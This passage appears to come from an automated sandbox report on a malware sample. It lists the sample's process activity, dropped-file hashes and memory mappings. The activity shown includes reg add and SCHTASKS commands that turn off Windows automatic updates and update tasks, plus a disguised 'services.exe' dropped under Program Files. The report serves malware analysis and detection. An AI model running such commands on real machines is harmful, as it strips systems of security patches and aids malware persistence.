- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "dycqfudelnyzo"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\services.exeFilesize
2.0MB
MD579dbc1a54d33366681f1e926d565cad4
SHA1907cf0ec6784bf140f9759d6931d3697da0fc229
SHA256465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
SHA5126d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
-
C:\Program Files\Windows\services.exeFilesize
2.0MB
MD579dbc1a54d33366681f1e926d565cad4
SHA1907cf0ec6784bf140f9759d6931d3697da0fc229
SHA256465b187a795c015825c5a0a1791d1587a90079759b0f418ff5ea6afc44dd68d0
SHA5126d66ae7edc6028e8bc1eac9caf85f5d2d38a6c000e5fa907c9eec5786b225aeeb7c0b565bee9aa7b09f6f792d0857e3d06f0e3ed832d73047506a18ce15371dd
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logFilesize
539B
MD584f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
memory/624-385-0x0000000000000000-mapping.dmp
-
memory/952-361-0x0000000000000000-mapping.dmp
-
memory/1012-370-0x0000000000000000-mapping.dmp
-
memory/1088-268-0x0000025CD79E0000-0x0000025CD79EA000-memory.dmpFilesize
40KB
-
memory/1088-235-0x0000025CD7BD0000-0x0000025CD7C89000-memory.dmpFilesize
740KB
-
memory/1088-229-0x0000025CD79F0000-0x0000025CD7A0C000-memory.dmpFilesize
112KB
-
memory/1088-211-0x0000000000000000-mapping.dmp
-
memory/1312-360-0x0000000000000000-mapping.dmp
-
memory/1648-172-0x0000000000000000-mapping.dmp
-
memory/1804-382-0x0000000000000000-mapping.dmp
-
memory/2136-179-0x0000000000000000-mapping.dmp
-
memory/2160-176-0x0000000000000000-mapping.dmp
-
memory/2244-363-0x0000000000000000-mapping.dmp
-
memory/2784-169-0x0000000000000000-mapping.dmp
-
memory/2792-181-0x0000000000000000-mapping.dmp
-
memory/2900-369-0x0000000000000000-mapping.dmp
-
memory/2952-128-0x0000000000000000-mapping.dmp
-
memory/3052-173-0x0000000000000000-mapping.dmp
-
memory/3172-186-0x0000000000000000-mapping.dmp
-
memory/3176-391-0x0000000000000000-mapping.dmp
-
memory/3236-192-0x0000000000000000-mapping.dmp
-
memory/3348-185-0x0000000000000000-mapping.dmp
-
memory/3372-401-0x0000019D2DC30000-0x0000019D2DC37000-memory.dmpFilesize
28KB
-
memory/3372-398-0x0000019D2DFC0000-0x0000019D2DFC6000-memory.dmpFilesize
24KB
-
memory/3380-189-0x0000000000000000-mapping.dmp
-
memory/3456-174-0x0000000000000000-mapping.dmp
-
memory/3460-381-0x00000243655E0000-0x00000243655F2000-memory.dmpFilesize
72KB
-
memory/3460-373-0x000002434CC50000-0x000002434CC56000-memory.dmpFilesize
24KB
-
memory/3472-170-0x0000000000000000-mapping.dmp
-
memory/3472-371-0x0000000000000000-mapping.dmp
-
memory/3476-193-0x0000000000000000-mapping.dmp
-
memory/3560-386-0x0000000000000000-mapping.dmp
-
memory/3692-180-0x0000000000000000-mapping.dmp
-
memory/3796-388-0x0000000000000000-mapping.dmp
-
memory/3816-195-0x0000000000000000-mapping.dmp
-
memory/3868-390-0x0000000000000000-mapping.dmp
-
memory/4032-366-0x0000000000000000-mapping.dmp
-
memory/4288-191-0x0000000000000000-mapping.dmp
-
memory/4320-380-0x0000000000000000-mapping.dmp
-
memory/4484-182-0x0000000000000000-mapping.dmp
-
memory/4492-194-0x0000000000000000-mapping.dmp
-
memory/4508-368-0x0000000000000000-mapping.dmp
-
memory/4580-184-0x0000000000000000-mapping.dmp
-
memory/4628-197-0x0000000000000000-mapping.dmp
-
memory/4656-210-0x0000000000000000-mapping.dmp
-
memory/4700-141-0x0000010F52690000-0x0000010F5286D000-memory.dmpFilesize
1.9MB
-
memory/4700-121-0x0000010F6D000000-0x0000010F6D1DC000-memory.dmpFilesize
1.9MB
-
memory/4736-140-0x000002007BD10000-0x000002007BD86000-memory.dmpFilesize
472KB
-
memory/4736-135-0x0000020079A30000-0x0000020079A52000-memory.dmpFilesize
136KB
-
memory/4736-129-0x0000000000000000-mapping.dmp
-
memory/4740-367-0x0000000000000000-mapping.dmp
-
memory/4776-175-0x0000000000000000-mapping.dmp
-
memory/4784-362-0x0000000000000000-mapping.dmp
-
memory/4792-387-0x0000000000000000-mapping.dmp
-
memory/4824-364-0x0000000000000000-mapping.dmp
-
memory/4836-365-0x0000000000000000-mapping.dmp
-
memory/4844-375-0x0000000000401BEA-mapping.dmp
-
memory/4844-379-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4844-374-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/4848-171-0x0000000000000000-mapping.dmp
-
memory/4848-372-0x0000000000000000-mapping.dmp
-
memory/4896-183-0x0000000000000000-mapping.dmp
-
memory/4896-389-0x0000000000000000-mapping.dmp
-
memory/4932-190-0x0000000000000000-mapping.dmp
-
memory/4948-177-0x0000000000000000-mapping.dmp
-
memory/4952-383-0x0000000000000000-mapping.dmp
-
memory/5012-188-0x0000000000000000-mapping.dmp
-
memory/5020-187-0x0000000000000000-mapping.dmp
-
memory/5064-178-0x0000000000000000-mapping.dmp
-
memory/5068-384-0x0000000000000000-mapping.dmp